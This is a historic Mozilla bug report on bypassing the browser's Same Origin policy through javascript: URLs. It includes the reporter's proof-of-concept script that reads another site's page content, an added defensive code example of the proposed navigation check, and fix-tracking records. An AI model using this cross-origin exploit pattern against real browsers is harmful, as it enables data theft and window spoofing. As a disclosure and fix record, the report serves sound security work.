Closed
Bug 32088
Opened 25 years ago
Closed 25 years ago
Circumventing Same Origin security policy using javascript: URLs
Categories
(Core :: Security, defect, P3)
VERIFIED
FIXED
M15
People
(Reporter: norrisboyd, Assigned: norrisboyd)
Details
(Whiteboard: fix in hand)
Subject: Circumventing Same Origin security policy using javascript: URLs
Date: Thu, 16 Mar 2000 16:23:00 +0200
From: Georgi Guninski <joro@nat.bg>
To: Norris Boyd <norris@netscape.com>

It is possible to circumvent Same Origin security policy using javascript: URLs.
The problem is changing the location of a target document to javascript which changes the document content while the location is that of the target document.
This also allows window spoofing.
I would suggest disallowing navigating to javascript: URLs across domains.

The code is:
------------------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com");
a.location="javascript:document.open();document.write('<IFRAME SRC=http://www.yahoo.com></IFRAME><A HREF=javascript:alert(window.frames[0].document.links[0].href)>Click here to see the first link from Yahoo</A>');document.close()";
</SCRIPT>
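The mitigation suggested in the report above (disallowing navigation to javascript: URLs across domains), modeled as an added example; it is not part of the original report and is not the fix that was checked in. The function names and the attacker.example caller address are hypothetical, and origins are compared as scheme, host and port using the standard URL parser.

```javascript
// Added example: a model of the suggested navigation check.
// decideNavigation, sameOrigin and originOf are hypothetical names.

// Returns the serialized origin (scheme://host[:port]) or null when the
// URL cannot be parsed or has an opaque origin (serialized as "null").
function originOf(url) {
  try {
    const origin = new URL(url).origin;
    return origin === "null" ? null : origin;
  } catch (e) {
    return null;
  }
}

// Two URLs are same-origin only if both have a real origin and they match.
function sameOrigin(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  return oa !== null && oa === ob;
}

// callerUrl:    URL of the document whose script assigns the location
// targetDocUrl: URL of the document currently loaded in the target window
// newLocation:  the value being assigned to the target's location
function decideNavigation(callerUrl, targetDocUrl, newLocation) {
  let parsed;
  try {
    // The URL parser lowercases the scheme, trims leading whitespace and
    // drops embedded tabs/newlines, so "  JaVa\tScript:" is still caught.
    parsed = new URL(newLocation, targetDocUrl);
  } catch (e) {
    return { allow: false, reason: "unparseable URL" };
  }
  if (parsed.protocol !== "javascript:") {
    // An ordinary navigation replaces the document; the new document
    // gets its own origin, so nothing runs as the old one.
    return { allow: true, reason: "regular navigation" };
  }
  // A javascript: URL runs in the context of the target document, so the
  // caller must already be allowed to script that document.
  if (sameOrigin(callerUrl, targetDocUrl)) {
    return { allow: true, reason: "same-origin javascript: URL" };
  }
  return { allow: false, reason: "cross-origin javascript: URL" };
}
```

Comparing the parsed scheme rather than matching on the raw string is what keeps mixed-case or whitespace-padded variants of the scheme from slipping past the check.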
Assignee
Updated•25 years ago
Status: NEW → ASSIGNED
Target Milestone: M15
Assignee
Updated•25 years ago
Whiteboard: fix in hand
Assignee
Comment 2•25 years ago
Fixed:
Checking in layout/html/document/src/nsHTMLDocument.cpp;
/m/pub/mozilla/layout/html/document/src/nsHTMLDocument.cpp,v  <--  nsHTMLDocument.cpp
new revision: 3.207; previous revision: 3.206
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Assignee
Updated•25 years ago
Group: netscapeconfidential?
Assignee
Comment 3•25 years ago
CC'ing joro@nat.bg
Assignee
Updated•25 years ago
Group: netscapeconfidential?
Updated•19 years ago
Flags: testcase+
Updated•17 years ago
Flags: in-testsuite+ → in-testsuite?